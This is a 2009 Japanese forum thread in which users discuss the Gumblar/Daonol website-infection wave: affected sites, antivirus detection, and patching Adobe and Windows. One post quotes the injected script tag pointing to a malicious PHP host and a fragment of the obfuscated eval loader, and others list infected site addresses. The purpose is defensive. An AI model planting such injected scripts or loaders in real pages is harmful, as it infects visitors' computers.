
391 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 10:20:43 ]
何の責任も負わない個人が作ったものだし、
作者がその気になれば偽物をDLさせられて泣きを見るだけだろ。

392 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 10:36:26 ]
>>391>>387に対してのものか
だからこそ
>なぜこういうのをAdobeが作らないのか…。
個人ではないベンダーに期待を寄せるような
コメントが書き添えられているのではないか


393 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 11:07:29 ]
なぜも何も自動でアップデートするようになってるだろ

394 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 12:59:55 ]
えっ

395 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 13:43:23 ]
Genoウイルス(Gumblar)検出状況
slashdot.jp/~pluto/journal/491348
このphpファイルは見に行くたびに変わりますが、
カスペルスキーさんはまるで「おれにまかせろ」状態。かっこいい。

396 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 16:36:03 ]
>>390
ウイルスはいれちゃだめよ

397 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 16:43:00 ]
>>394
えっじゃねえよ
頭使えよ



398 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 17:54:51 ]
頭使うもなにも
自動でアップデートとか初耳なんだが
設定しだいで出来るってことなのか?

399 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 18:24:49 ]
正確にはアップデート確認か
求めてることは同じだろ

400 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 18:32:16 ]
Flashはアップデートの確認
Readerはアップデートまで自動でやってくれるね

401 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 19:00:56 ]
そんなに自動が好きなのか

402 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 19:06:22 ]
何を言ってるんだ君は

403 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 19:24:01 ]
Readerはたしか環境設定のアップデータの項目に
自動にするしないの選択項目があってわかりやすいよ
ただしこれは最新版の場合ね

それより前のバージョンだと、環境から一般いってそこに
アップデートについての選択項目があったと思う

404 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 20:46:41 ]
>>386
しかしJRAが感染してたのに騒ぎにもならないとは
もう、みんな対策を済ませてたのか
そんなはずはないな
GENOウイルス自体に、もう関心がなくなってるのか

405 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 20:51:40 ]
前回の時も全然ニュースにならなかったよ。
分かり難い害だから話題にしにくいんじゃない?

406 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 20:56:08 ]
”みんな”はウイルス自体に関心がないからな・・・
認知されるのはいつも通り被害が十分に行き渡ってからだろ

407 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 20:57:22 ]
ヤフーに乗ったのもずいぶんたってからだったしな



408 名前:名無しさん@お腹いっぱい。 mailto:age [2009/10/22(木) 21:24:11 ]
ひきこもり共和国という交流サイトがやられた模様。
love6.2ch.net/test/read.cgi/hikky/1221915065/827-

409 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 23:05:01 ]
>>404
馬券買ってるおっさん世代はウイルスなんて知らんのじゃないか?

410 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 23:29:17 ]
馬券買うってことは金銭とか扱うだろうしJRA早いとこ対策しないとまずいんじゃ

411 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 16:38:02 ]
JRAまじかよーorz
ノンスクリプト許容してるサイトなのにorz

412 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 16:41:02 ]
こんなとこ来るような人なら実害ないだろ

413 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 16:55:48 ]
>>411
JRA確認してないんでわからんけど、通常であれば
外部ドメインにしこまれてたはずだよ
全許可ならダメだけど見知らぬドメインは許可されてなかったんじゃないかな

414 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 17:06:08 ]
OSがvista以降なら問題ない

415 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 17:11:43 ]
ガンブラさんは今月で3つも確認
いずれも個人サイト

416 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 17:44:54 ]
JRAの潔い態度に感動したです
GENOも、これくらい堂々としてたら…

417 名前:名無しさん@お腹いっぱい。 [2009/10/24(土) 02:41:16 ]
【セキュリティ】「GENO」に酷似したウイルスが流行の兆し、国内60サイトで感染確認(09/10/23)
pc11.2ch.net/test/read.cgi/pcnews/1256299220/

GENOウイルスに類似したあらたな攻撃が発生 
tsushima.2ch.net/test/read.cgi/news/1256287835/



418 名前:名無しさん@お腹いっぱい。 mailto:age [2009/10/24(土) 15:26:49 ]


419 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 18:15:02 ]
ここに出入りしているのは、ちゃんとupdateしているような奴ばかりだから情報が集まらないな。
もっとレベルの低いところじゃないと。。

420 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 18:37:25 ]
Gumblar類似のDaonolが広がってるみたい
全国でPCが起動しなくなるトラブルが多発。PC初心者の多い富士通サポセンがパンク状態 
tsushima.2ch.net/test/read.cgi/news/1256308562/

黒い画面にマウスカーソル (Win32/Daonol)
blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx

421 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 18:41:03 ]
>>420 DaonolとGumbarの因果関係は現時点では不明というか
憶測の域じゃないのか


422 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 18:57:23 ]
>>421
ウイルス名は各ベンダーが好き勝手に付けてるから。Daonol=Gumblar。
ttp://internet.watch.impress.co.jp/cda/special/2009/05/21/23523.html
>なお、このウイルスは「Gumblar」という名称以外にも、
>Symantecでは「Infostealer.Daonol」、
>マイクロソフトでは「Win32/Daonol.F」、
>Kasperskyでは「Trojan-Dropper.Win32.Agent.apfn」といった名称が付けられている。

423 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 19:07:51 ]
>>422 サンクス。ようやくわかった。
ていうか大昔にウイルスの名前をベンダー間で統一しようって言ってたんじゃないのかよ。。

424 名前:まとめ mailto:sage [2009/10/24(土) 19:51:00 ]
Genoウイルス(Gumblar)再び
ttp://slashdot.jp/submission/36590/GenoGumblar

■「Gumblar」酷似ウイルスが流行の兆し、国内60サイトで感染確認
ttp://internet.watch.impress.co.jp/docs/news/20091023_324076.html

黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx

JRAレーシングビュアーでサイト改ざん ウイルス感染の疑い(2009.10.21)
ttp://www.weekenddream.jp/keiba_news/cat70/20091021_1.html

「Gumblar」の脅威再び―Kaspersky が警告
ttp://japan.internet.com/webtech/20091023/4.html
Gumblar に酷似、新たな脅威発生に警告
ttp://www.kaspersky.co.jp/news?id=207578788

ウイルス・セキュリティ情報 | dynabook.com サポート情報
コンピュータウイルス「Torojan.Win32/Daonol.H」について
ttp://dynabook.com/assistpc/info/20091022.htm

コンピュータウイルス「Win32/Daonol」に関するご注意
ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022?c=jp&l=ja&s=gen

425 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 23:47:55 ]
ttp://cycle-world.jp/
ここも?

426 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 23:52:36 ]
>>425
ぽいね

427 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 23:52:59 ]
>>425
やられてるね
あと、URLを書くときは“.”を“●”などに置き換えて



428 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 23:58:21 ]
スタッフブログの方は無事っぽ
普通に毎日更新で見てるっぽいし教えるべきかな?

429 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:00:25 ]
がっつり逝ってる
ワロス

430 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:09:23 ]
何のサイト?
さすがに踏みたくない

431 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:11:26 ]
西日本最大級オートバイ用品専門店らすぃ

432 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:13:13 ]
>>431
ありがとう


433 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:14:39 ]
<script src=*****mages/index.php ></script>
の部分がそうか?
繋がんないけど

434 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:16:44 ]
サイトも店の色も派手なツートンなんでドンパチよろしいんじゃないんでしょーか

435 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:20:14 ]
>>433
スクリプトだけ書いてあるページに飛ばされるっぽいが…
ソースチェッカーで見たのでレイアウトは知らん

スタッフブログ※欄に凸っていいのか?
だが何を書いたらいいのかよくわからんので
詳しい人がやってくれるならお願いしたいが

436 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:21:34 ]
>>433
接続2回目は拒否られるよね
調べ回避の手段っぽいわ

437 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:25:36 ]
やっぱVistaだと無効なんだな
もちろん7もだろうけど



438 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:33:03 ]
>>428
24日土曜も更新してるね
余裕っすね

439 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:33:47 ]
これはXPから7へ移行させようとするマイクロソフトの陰謀だったんだよ!!

440 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:34:56 ]
ΩΩΩ<な(ry

まぁ実際問題7がびす太ほどアレじゃなければ乗り換えようかと思ってるがな

441 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:37:41 ]
vistaでもUAC切ってたらマズイんだよな?
やかましいから切ってるけど

442 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:39:48 ]
スタッフ写真無くて(´・ω・) ツマンナス

443 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:45:37 ]
>>441
この件に関してはUACは関係ない
もちろん有効にしておいた方がより安全だが

444 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 01:45:52 ]
結局だれも教えに行ってないのかバロス

445 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 01:52:26 ]
管理者様

急啓
ていへんだぁていへんだぁ
おたくのサイトがていへんだぁ
顧客に毒盛り、ていへんへんだぁ
              かしこ


FAX番号わかったけど(´・ω・) ツマンナス

446 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:08:07 ]
ググるとHPのタイトル部分にスクリプトを埋め込まれたのがいっぱいヒットするな、もう無差別攻撃か・・・

447 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:08:34 ]
p-frying●com/

ここも感染してる
ていうか前のGENO騒ぎの時から感染してるっぽい



448 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:10:06 ]
.は●に変えたがh抜き忘れたorz

449 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:12:11 ]
この攻撃ってAdobeが脆弱性発表したらすぐに蔓延したんだよな
発表しなかったらこんなことにならなかったかもな
まあそう言うわけにもいかないのかも知れないが

450 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:29:19 ]
>>446
なにでググってる?
martuzあたり?

451 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:44:05 ]
木造で中古だと利回りがきつそうで(´・ω・) カワイソス

452 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 10:31:32 ]
Avast!のWebシールドが最近の*.phpにも反応するようになった

453 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 11:29:45 ]
糞チェッカー
バージョン指定書きで後で後悔するといったのにねえ
さすがアフィ厨

454 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 13:25:50 ]
>>425-427
<script src=hxxp://fotothhi.be/images/index.php ></script>

.phpの中身
//<script>
dLLdw=24;if(unescape)dLLdw='';jYCXE=unescape('%'+dLLdw);
〜中(難読化されてたから)略〜
eval(unescape(i0j.replace(/[IlN]/g,jYCXE)));
//</script>


455 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:17:13 ]
サイトはどうやって改ざんされてるんだ?


456 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:26:44 ]
>>452
いろいろ試した感じだとIE6なら金曜くらいから拾ってそうな感じだった
他も拾うようになったのかな

457 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:27:38 ]
>>455
FTP使って改ざんされてます
サーバに攻撃とかそういうのじゃないです
つーかこのへんは前と変わってないはず



458 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:52:05 ]
>>456
同じサイトの検体でも日が違うと中身が変わって対応状況はバラバラ
今はAvast!とKasperskyの対応がよさそう

2/41 (4.88%)
ttp://www.virustotal.com/jp/analisis/34330a5a110da2ed5f57ee54b7b8df05a8a8d7971e8d898b6f99fe6fb5e6442d-1256440050
5/41 (12.20%)
ttp://www.virustotal.com/jp/analisis/39669ef4eabe7224ff262f678579542e39be15316f4125bd58b74c6c18fb472c-1256440598

459 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 16:39:07 ]
何となく思ったのだが

何気に Vista、Windows7 への移行を促そうとする
大人の事情が暗に蠢いていたりとかするのだろうか…

460 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 16:43:01 ]
7への移行とアンチウイルス2010年版への移行を促すための業界ぐるみのイベントだろ

461 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 17:56:34 ]
>>458
日ごとどころかアクセスするたびにかわるわよ
でも非IEでもAvastが対応してきたようだね

462 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:08:42 ]
XPの脆さが改めて露呈しただけだろ

463 名前:名無しさん@お腹いっぱい。 [2009/10/25(日) 18:10:56 ]
Flashのアップデートしてなくてアンチウイルス入れてないやつがたんまり
居るってことだな
MSE普及の一環か

464 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:22:40 ]
カスペでさっき遮断した
本当に困る

465 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:30:55 ]
>>463
MSEはおろかノートンやバスターでブロックできんからこれだけ広まってるんだろ

466 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:34:44 ]
>>463
Flash Playerだけじゃないよ

467 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:39:31 ]
genolists.alink.uic.to/
新種感染サイトのリストはここ使うの?



468 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 19:04:29 ]
>>450
Google先生は、AS番号ごとにウイルス感染サイト(gumbler以外も含む)を教えてくれるよ。

例えば、
楽天(infoseek.co.jp、cool.ne.jp)
safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23820
Softbank(geocities.jp)
safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23816
とかね。

最近までgumblar/martuzに改竄されて放置されてたサイトは、
新型に改竄されてる可能性が高い。

469 名前:あげ [2009/10/25(日) 20:08:52 ]
fileseek.jp/(携帯専用)
PCサイト閲覧Proxyのメニュー(*ボタン)からソースを見れるから
簡易チェッカーとして使えるかもしれん。
※パケ定必須

470 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:05:38 ]
>>465
ノートンは脆弱性を遮断する機能で防げるんじゃないだろうか

471 名前:名無しさん@お腹いっぱい。 [2009/10/25(日) 22:19:28 ]
バスター最新にしても駄目?

472 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:43:57 ]
>>471
それよりもAdobeのアップデートとWindowsアップデートしとけば問題ない

473 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:45:00 ]
>>470
分かる範囲でいくつかのサイトに行ったがすべてその機能で遮断できる

474 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:10:28 ]
アップデート全部したんだが、これで再起動しても平気かな?

475 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:00 ]
ソフトの更新は予防のためにするものであって
感染後にやっても手遅れだよ

476 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:15 ]
/(^o^)\

477 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:51 ]
>>474
カスペのオンラインスキャンでウイルススキャンしてからのほうがいいよ



478 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:56 ]
>>468 その2つのページだけで、日本国内のgumblar.x感染サイトが9つある。

ikebananonohana●hp●infoseek●co●jp
pengzipk●hp●infoseek●co●jp
seiya06●hp●infoseek●co●jp
pee3●hp●infoseek●co●jp
www●ski-srsc●com
www●geocities●jp/fumisugi43/
www●geocities●jp/jr1ujx/
www●geocities●jp/tileaf05/
www●jpla-aichi●com

こりゃ、国内60サイトどころじゃないでしょ。

479 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:15:55 ]
>>477
現在メンテナンス中のため、ご利用いただけません。ご迷惑をおかけして申し訳ございません。
機能を強化した新しいバージョンのカスペルスキーオンラインスキャナが近日中にリリースされます。
また、個人向け総合セキュリティソフト「Kaspersky Internet Security 2010」の無料試用版 (有効期間:30日間) をダウンロードしてご利用いただけます。

480 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:17:51 ]
ニフティもエンジンはカスペだからそっちでやればいいんじゃね

481 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:18:41 ]
>>474
ちなみに全部ってのは本当に全部やったの?
たとえばFlash PlayerはIEとそれ以外じゃ別のものだよ

482 名前:473 mailto:sage [2009/10/25(日) 23:23:45 ]
さらに色々調べたが
ノートンはファイルの検査では検出しないけど
ブラウザで読み込むと検出する
サイトアドレスではなくファイルで検出するようだ

この後バスター入れて試してみる

483 名前:473 mailto:sage [2009/10/26(月) 00:10:01 ]
バスター入れてみたが試した範囲ではすべて遮断される
ただデスクトップにおいたphpファイルは読み込める
2度目以降は無効になるような場合でも遮断される
サイトアドレスで遮断してるように思えるがよく分からない

484 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:29:06 ]
>>483
調査乙

485 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:48:20 ]
>>483
激乙です!
てことは大抵のアンチウイルスソフト入れてる人は
感染したサイト見ても、とりあえず感染は防げてるってことなのかな
マカフィーはどうだろう

486 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:56:15 ]
>>485みたいのが一番危ないタイプだな

487 名前:473 mailto:sage [2009/10/26(月) 00:58:05 ]
>>485
その前に試したPandaは読み込めちゃったね
違う段階で遮断できるかも知れないけど



488 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:05:20 ]
>>486
アンチウイルスソフトやウインドウズアップデートは最新にしてたんだけど、
adobeは最新の一つ手前くらいのままだったからやっぱり感染したかな…

>>487
そっかー
即レスありがとう

489 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:19:27 ]
>>488
心配ならOSいれなおし

490 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:26:06 ]
データのバックアップしても、入れ直したパソにそのデータ入れたら、再感染だよね?
このウイルスはそんなことないとかないかorz

491 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:47:59 ]
>>488
セコムに入っているから大丈夫!と鍵をかけずに外出したようなものだね
モノに頼ってそれに過信してしまって
一番肝心なところである
それを使う人間がセキュリティへの認識を忘れてしまっては
どんなに優れたモノを使っていても意味をなさないよ

492 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:51:13 ]
アップデートは最低でもこれくらいやらないとな

Windows Update / Microsoft Update
Adobe Flash Player 10.0.32.18 (IEと非IE両方)
Adobe Reader 9.2 (導入済ならアップデート。ReaderのJavaScriptは切る)

上記は現段階の新型Daonol/Gumblarには必須
亜種でどうなるか分からないので下記も実施

Adobe Shockwave Player 11.5.1.601 (導入済ならIEと非IE両方。正直アンインストールでいい)
Java 6 Update 16 (旧バージョンはすべてアンインストール)

あとはQuickTimeとRealPlayerあたりか
使わないものはアンインストールだな

493 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:53:31 ]
>>490
確実に大丈夫とはいえない

494 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:00:49 ]
今回Adobeのいつ頃のき弱性をついたものなのかもう分かってるの?

495 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:04:00 ]
もうFlashなんかやめてSilverlightを採用すればいいのに

496 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:05:06 ]
Windows Updateぐらい自動更新の設定にしとこうよ
というかMSがWindows Updateの対象にAdobe ReaderとFlash入れるだけでいいのに

497 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:05:44 ]
「ぜいじゃく」って読むんだよ、ぼうや



498 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:08:04 ]
きじゃくてwww
言語弱者もいいとこwww

499 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:08:49 ]
釣られんなよw

500 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:11:04 ]
後釣り宣言カコワルイ

501 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:13:52 ]
生酒でも飲んでまったりやろうや

502 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:18:19 ]
この時間から酒飲むと朝つらいからお断りします

503 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:23:56 ]
>>494
特定の脆弱性だけじゃなく複数利用してる
Adobe製品だけじゃなくMicrosoftのもあった
いろいろな組み合わせみたいなんで確実にこれだけふさげばいいってものはないよ

504 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:37:29 ]
【中卒の為の国語辞典】

脆弱性 【ぜいじゃくせい】

脆【もろ】く、傷つきやすいこと。攻撃に対して弱いこと。

505 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:02:18 ]
前のGENOの時はメールとかお気に入りとか、そういうファイルデータにつく
ウイルスじゃないから、感染してからバックアップとっても
平気とかどこかで見た気がする。
もちろんデータをクリーンインストールしてから戻すときは
当然ウイルスチェックしてからということだったけど。

506 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:05:13 ]
ぜいじゃく性ですね
すみません
本当に恥ずかしい間違いでした
教えてくれてありがとうございます

507 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:15:35 ]
本当の読み方はぜいじゃくしょう
ただ、最初に用語辞典に載った時にぜいじゃくせいとルビを振られたから今の読みになった
豆知識



508 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:39:39 ]
>>507
恥ずかしい限りですが勉強になります

やっぱりアップデートとかをこまめにするのが一番ですが
今回のは駆除はカスペができるようなので、カスペで無事検出駆除できた人は
OS再インスコしなくて良さそう?なのかな?

509 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:41:22 ]
カスペで駆除できたって報告あるか?

510 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:50:26 ]
ありますんね・・・

511 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:52:09 ]
カスペ自らが宣言してるけどどこまで対応してるのかわからん
www.kaspersky.co.jp/news?id=207578788

512 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:52:29 ]
試しに感染してみるか
古いアドビのソフトがあれば

513 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:03:41 ]
無駄無駄
アンチウィルスソフトに過剰な期待を抱かないほうがいい
日々、腐るほど亜種が湧いてるからな

514 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:07:04 ]
そのうちvistaや7も感染対象になるのかね

515 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:07:25 ]
カスペもオンラインスキャナをメンテ中とか鬼だよな。


516 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:11:48 ]
Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
www.forest.impress.co.jp/docs/review/20091020_323014.html
hide9999.web.fc2.com/

517 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 07:13:03 ]
既出
もともと自動



518 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:14:02 ]
無料駆除ツールでてますか?
カスペ体験版入れるしかないのか・・・

519 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:23:46 ]
体験版じゃなくて製品版買えばいいだろ

520 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 11:45:48 ]
HD買ってきてOSインストールして
外したHDを外付けにしてバスター2010でウイルススキャン
トロイ式なんとかかんとか と出て隔離に成功

なんでも最新がいいんだなと思って IEは6から8へ
バスターも06から10へ

正直新しいPC買ったみたいです(^O^)

521 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 14:46:01 ]
>>420
富士通よりシェアがデカいNEC(1位NEC 2位富士通)も当然パンク、
富士通にならってリリース出しました。

【お詫び】電話お問い合わせ窓口の混雑について
ttp://121ware.com/navigate/support/121cc/info/20091026/

東芝
ttp://dynabook.com/assistpc/info/20091022.htm
SONY
ttp://search.vaio.sony.co.jp/solution/S0910211068384/
DELL
ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022

522 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 15:09:12 ]
>>521
一昨日だっけか?東芝のサポートって類似の質問はないとか言って蹴ってなかったか?

523 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 15:32:57 ]
>>508
前回のも普通に駆除できるから
無知が作ったウィキなんて信用するなよ

524 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 16:20:54 ]
SonyはVistaも対象に含めているのか

525 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:01:40 ]
なんだろこれ・・・

www■idealgroup-24■com/
→ theflyingpoodles■com/images/DSC_0035■php
→ chezmichel■nl/images/index3■php
→ bellsworld■com/new_submissions/verhor1■php
→ psunrise■cn/images-d/index2■php (アクセス拒否)

最後のアクセス拒否以外の中身が妙な404で AguseGatewayで見ると//404
ソース見るといずれも // iframes are EVIL! Hate Zeus!  というメッセージ付き

526 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:13:14 ]
なんで

527 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:13:54 ]
途中送信orz

なんでabout:blank開いてんだこれ
本当に404なら分かるけど



528 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:18:49 ]
>>524
でもソニーはウイルス名の指定がないな。
とにかくリカバリしやがれ(意訳)の一点張り。あんまりあてにできないのでは。

529 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:23:58 ]
Zeusっつーとこれかな
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091007/338476/

530 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:25:43 ]
Gumblar再襲来(3) Adobe Reader/Flash/IE/Office、攻撃は最新版でブロック
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2045
25日時点でカスペルスキーが「Trojan-Downloader.JS.Gumblar.x」の検出名で全件を、
Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。
G Dataが「JS:Downloader-EZ」で13件を検出した。
ちなみに前日に行った3件の事前調査では、カスペルスキー以外は全滅だった。

531 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 21:06:13 ]
japan.internet.com/webtech/20091010/12.html
>Adobe の勧告には、次のような記述がある。
>「『Windows Vista』上で DEP (データ実行防止) 機能を有効化している
>Adobe Reader および Acrobat 9.1.3 のユーザーは、この攻撃の影響を受けない。

10/13のAcrobatの脆弱性ですが
VISTAでもDEPが無効だと駄目だったようですね。
VISTAがプレインストールされているPCだと
CPUがDEPにまず対応している気がしますが・・・

532 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 21:44:06 ]
XPでハードウェアDEPが有効かつ
IE8のメモリ保護が有効だった場合はどうなんでしょうね・・・
VISTAと同様の結果になるのか、違うのか・・・

533 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:17:04 ]
ソフト使わなくても、FlashPlayerとAdobeReaderを自動でアップデートできるって
上のほうで言われてるから調べてみた。
■FlashPlayer
www.adobe.com/jp/support/kb/ts/228/ts_228473_ja-jp.html
■AdobeReader(9.20は編集>環境設定>アップデーターでできた)
www.geocities.jp/fssreport/update/article003/index.html

>Flash Player の自動更新のチェックはバックグラウンドでの動作ではなく、
>ブラウザ上で Flash コンテンツを読み込んで Flash Player が起動した際に実行されます。

FlashPlayerだけでなく、AdobeReaderも同じだと思うんだけど、起動した際にアップデートって、
